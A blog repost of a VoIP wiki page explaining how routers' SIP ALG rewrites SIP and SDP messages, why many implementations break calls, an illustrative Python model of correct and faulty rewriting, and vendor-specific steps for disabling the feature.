Routers SIP ALG

SkyHi @ Monday, March 08, 2010

Introduction

Many of today's commercial routers implement SIP ALG (Application-level gateway), coming with this feature enabled by default. While ALG could help in solving NAT related problems, the fact is that many routers' ALG implementations are wrong and break SIP.

There are various solutions for SIP clients behind NAT, some of them in client side (STUN, TURN, ICE), others in server side (Proxy RTP as RtpProxy, MediaProxy). ALG works typically in the client LAN router or gateway. In some scenarios some client side solutions are not valid, for example STUN with symmetrical NAT router. If the SIP proxy doesn't provide a server side NAT solution, then an ALG solution could have a place.

An ALG understands the protocol used by the specific applications that it supports (in this case SIP) and does a protocol packet-inspection of traffic through it. A NAT router with a built-in SIP ALG can re-write information within the SIP messages (SIP headers and SDP body) making signaling and audio traffic between the client behind NAT and the SIP endpoint possible.



SIP ALG example

  • caller behind NAT with private IP 192.168.1.33.
  • caller router public IP 192.0.2.200
  • SIP proxy in Internet with domain "example.com".


INVITE from the LAN client (with private IP)

INVITE sip:destino@example.com SIP/2.0
Via: SIP/2.0/UDP 192.168.1.33:5060;branch=z9hG4bKjyofoqmp
Max-Forwards: 70
To: <sip:destino@example.com>
From: "Iñaki" <sip:ibc@example.com>;tag=nrrrx
Call-ID: xetazdjyktlpsfo@192.168.1.33
CSeq: 800 INVITE
Contact: <sip:ibc@192.168.1.33:5060>
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.1
Content-Length: 312

v=0
o=ibc 1090098764 894503441 IN IP4 192.168.1.33
s=-
c=IN IP4 192.168.1.33
t=0 0
m=audio 8000 RTP/AVP 98 97 8 0 3 101
a=rtpmap:98 speex/16000
a=rtpmap:97 speex/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=ptime:20
a=zrtp


Note that the "Contact" header and the SDP "c=" and "m=" lines (shown in red on the original page) need to be fixed before the INVITE arrives at the proxy (in case our proxy doesn't provide us with a server-side NAT solution). If not, the proxy reply will not arrive at the client (caller):
  • The caller couldn't receive in-dialog/sequential messages (ACK for the INVITE, BYE, REFER, re-INVITE...) since the address in "Contact" is not routable outside their network.
  • Unidirectional audio, since the caller told the callee to send audio to a non-routable address and port (so the caller won't hear the callee).

The "Via" header (shown in blue on the original page) doesn't need to be fixed, since SIP already handles it: the server adds the parameter "received=REAL_SOURCE_IP" to the "Via" header and sends the replies to that address. Anyway, some ALG implementations also change this value.


The same INVITE modified by the ALG router:

INVITE sip:destino@example.com SIP/2.0
Via: SIP/2.0/UDP 192.0.2.200:12345;branch=z9hG4bKjyofoqmp
Max-Forwards: 70
To: <sip:destino@example.com>
From: "Iñaki" <sip:ibc@example.com>;tag=nrrrx
Call-ID: xetazdjyktlpsfo@192.168.1.33
CSeq: 800 INVITE
Contact: <sip:ibc@192.0.2.200:12345>
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.1
Content-Length: 312

v=0
o=ibc 1090098764 894503441 IN IP4 192.168.1.33
s=-
c=IN IP4 192.0.2.200
t=0 0
m=audio 33445 RTP/AVP 98 97 8 0 3 101
a=rtpmap:98 speex/16000
a=rtpmap:97 speex/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=ptime:20
a=zrtp


The ALG has fixed the NAT related problem by:
  • Replacing IP in "Via" header with the public IP and port.
  • Replacing "Contact" with mapped public IP and port.
  • Replacing SDP media address with public IP and port.




SIP ALG problems

The main problem is the poor implementation of the SIP protocol in most commercial routers, and the fact that this technology is only useful for outgoing calls, not for incoming calls:
  • Lack of incoming calls: When a UA is switched on it sends a REGISTER to the proxy in order to be locatable and receive incoming calls. This REGISTER is modified by the ALG feature (if not, the user wouldn't be reachable by the proxy, since it indicated a private IP in the REGISTER "Contact" header). Common routers just maintain the UDP "connection" open for a while (30-60 seconds), so after that time the port forwarding ends and incoming packets are discarded by the router. Many SIP proxies maintain the UDP keepalive by sending OPTIONS or NOTIFY messages to the UA, but they only do it when the UA has been detected as NATted during registration. A SIP ALG router rewrites the REGISTER request, so the proxy doesn't detect the NAT and doesn't maintain the keepalive (so incoming calls will not be possible).
  • Breaking SIP signalling: Many common routers with built-in SIP ALG modify SIP headers and the SDP body incorrectly, breaking SIP and making communication simply impossible. Some of them do a wholesale replacement by searching for the private address in all SIP headers and the body and replacing it with the router's public mapped address (for example, replacing the private address if it appears in the "Call-ID" header, which makes no sense at all). Many SIP ALG routers corrupt the SIP message when writing into it (e.g. a missing semicolon ";" in header parameters). Writing incorrect port values greater than 65536 is also common in many of these routers.
  • Disallows server side solutions: Even if you don't need a client side NAT solution (your SIP proxy gives you a server side NAT solution), if your router has SIP ALG enabled and it breaks SIP signalling, it will make communication with your proxy impossible.
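To make both halves of this concrete, here is an added Python model (not code from voip-info.org or from any router) of the correct rewrite shown in the SIP ALG example above, of the "dumb text replacement" this section describes, and of the checks that expose it. The INVITE is the example one with some headers and codecs dropped; the NAT-mapped ports 12345 and 33445 are the ones from the example.

```python
"""Model of the correct ALG rewrite shown above and of the breakage described
under "SIP ALG problems". Added illustration, not code from voip-info.org or
from any router. The INVITE is the example one with some headers and codecs
dropped; 12345 and 33445 are the NAT-mapped ports from the example."""
import re

PRIVATE_IP, PUBLIC_IP = '192.168.1.33', '192.0.2.200'
SIG_PORT, MEDIA_PORT = 12345, 33445

def split_message(msg):
    """Return (request line, [header lines], body)."""
    head, _, body = msg.partition('\r\n\r\n')
    lines = head.split('\r\n')
    return lines[0], lines[1:], body

def join_message(start, headers, body):
    """Reassemble the message, recomputing Content-Length from the real body."""
    kept = [h for h in headers if not h.lower().startswith('content-length:')]
    kept.append(f'Content-Length: {len(body.encode())}')
    return start + '\r\n' + '\r\n'.join(kept) + '\r\n\r\n' + body

def header(headers, name):
    """Value of the first header called name, or '' if absent."""
    for h in headers:
        if h.lower().startswith(name.lower() + ':'):
            return h.split(':', 1)[1].strip()
    return ''

_RAW = (
    'INVITE sip:destino@example.com SIP/2.0\r\n'
    'Via: SIP/2.0/UDP 192.168.1.33:5060;branch=z9hG4bKjyofoqmp\r\n'
    'To: <sip:destino@example.com>\r\n'
    'From: "Inaki" <sip:ibc@example.com>;tag=nrrrx\r\n'
    'Call-ID: xetazdjyktlpsfo@192.168.1.33\r\n'
    'CSeq: 800 INVITE\r\n'
    'Contact: <sip:ibc@192.168.1.33:5060>\r\n'
    'Content-Type: application/sdp\r\n'
    '\r\n'
    'v=0\r\n'
    'o=ibc 1090098764 894503441 IN IP4 192.168.1.33\r\n'
    's=-\r\n'
    'c=IN IP4 192.168.1.33\r\n'
    't=0 0\r\n'
    'm=audio 8000 RTP/AVP 0 101\r\n'
    'a=rtpmap:0 PCMU/8000\r\n'
    'a=rtpmap:101 telephone-event/8000\r\n'
)
# The INVITE as sent by the LAN client, with a correct Content-Length.
INVITE = join_message(*split_message(_RAW))

def alg_rewrite(msg, private_ip, public_ip, sig_port, media_port):
    """What a correct ALG does: rewrite only Via, Contact and the SDP c=/m=
    lines, and leave Call-ID, tags and the SDP o= line untouched."""
    start, headers, body = split_message(msg)
    addr = re.compile(re.escape(private_ip) + r':\d+')
    new_headers = []
    for h in headers:
        if h.split(':', 1)[0].lower() in ('via', 'contact'):
            h = addr.sub(f'{public_ip}:{sig_port}', h)
        new_headers.append(h)
    sdp = []
    for line in body.split('\r\n'):
        if line.startswith('c='):
            line = line.replace(private_ip, public_ip)
        elif line.startswith('m=audio '):
            fields = line.split(' ')
            fields[1] = str(media_port)
            line = ' '.join(fields)
        sdp.append(line)
    return join_message(start, new_headers, '\r\n'.join(sdp))

def naive_alg_rewrite(msg, private_ip, public_ip, sig_port):
    """The 'dumb text replacement' the SpeedTouch and Linksys entries describe:
    every occurrence is rewritten, Call-ID included, and Content-Length is
    left stale, so the proxy receives a corrupted dialog."""
    return (msg.replace(f'{private_ip}:5060', f'{public_ip}:{sig_port}')
               .replace(private_ip, public_ip))

def alg_damage(original, rewritten):
    """Checks a proxy operator can run on a captured INVITE to expose a broken
    ALG: Call-ID changed, impossible port values, wrong Content-Length."""
    _, o_hdr, _ = split_message(original)
    _, r_hdr, r_body = split_message(rewritten)
    problems = []
    if header(o_hdr, 'Call-ID') != header(r_hdr, 'Call-ID'):
        problems.append('Call-ID was modified')
    for name in ('Via', 'Contact'):
        m = re.search(r':(\d+)(?:[;>]|$)', header(r_hdr, name))
        if m and int(m[1]) > 65535:
            problems.append(f'{name} port out of range')
    if int(header(r_hdr, 'Content-Length') or 0) != len(r_body.encode()):
        problems.append('Content-Length does not match body')
    return problems
```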



List of routers with SIP ALG enabled

The following is a list of SIP ALG router models, their issues and how to disable SIP ALG (enabled by default in most cases). Please add more data to this list if you have experienced problems due to a SIP ALG router.


SpeedTouch

Models: ST530 v6 (firmware >= 5.4.0.13) comes with SIP ALG enabled by default.
NAT type: symmetrical
Issues:
  • No incoming calls.
  • It replaces the private IP appearing in SIP headers with the public IP using a dumb text replacement. If for example the private IP appears in the "Call-ID" it replaces it too (which is completely unnecessary).
To disable SIP ALG:
~# telnet router
-> connection unbind application=SIP port=5060
-> saveall


Zyxel

Models: 660 family comes with SIP ALG enabled by default.
NAT type: symmetrical
Issues:
  • No incoming calls.
  • SIP protocol broken making 50% of outgoing calls impossible because the wrong values are inserted into SIP headers.
To disable SIP ALG:
~# telnet router
Menu option "24. System Maintenance".
Menu option "8. Command Interpreter Mode".
ip nat service sip active 0


Netgear

Models: WGR614v9 Wireless-G Router, DGN2000 Wireless-N ADSL2+ Modem Router
Firmware V1.0.18_8.0.9NA
To disable SIP ALG: From Wan Setup Menu, NAT Filtering, uncheck the box next to "Disable SIP ALG"


SMC

Models: ToDo
NAT type: not symmetrical
Issues:
  • The ALG doesn't replace the private address in the "Call-ID" header (which is correct) but it does replace the "call-id" value in the "Refer-To" header, so SIP transfer is broken.
To disable SIP ALG: ToDo; no ALG related options found via web and telnet. No idea how to disable it.


Linksys

Models: WRV200, WRT610N
NAT type: Symmetrical
Issues:
  • The ALG replaces the private address in the "Call-ID" header (not needed at all). Some phones (such as Linksys with the latest firmware) encode the "Call-ID" value in the "Refer-To" header (by escaping the dots), so the private IP appearing there is not replaced with the public IP. This causes the call transfer to fail, since the proxy/PBX/endpoint will not recognize the dialog info.
To disable SIP ALG: ToDo; no ALG related options found via web and telnet. No idea how to disable it.
To disable SIP ALG on WRT610N: Web Interface: Administration, Management, under side heading 'Advanced Features' SIP ALG, can be disabled.

Peplink Multi-WAN routers

Models: All multi-WAN models
To disable SIP ALG, go to http://<router.LAN.IP>/cgi-bin/MANGA/support.cgi
Click the "Disable" button under "SIP ALG Support"
Issues:
  • I'm not aware of any SIP ALG issues, but if you just want to turn it off, here you go.


Fortinet

Models: 800 comes with SIP ALG enabled by default.
To disable SIP ALG:
~# telnet firewall
config system settings
set sip-helper disable
set sip-nat-trace disable
end

config system session-helper
delete 12
end


REFERENCE
http://www.voip-info.org/wiki/view/Routers+SIP+ALG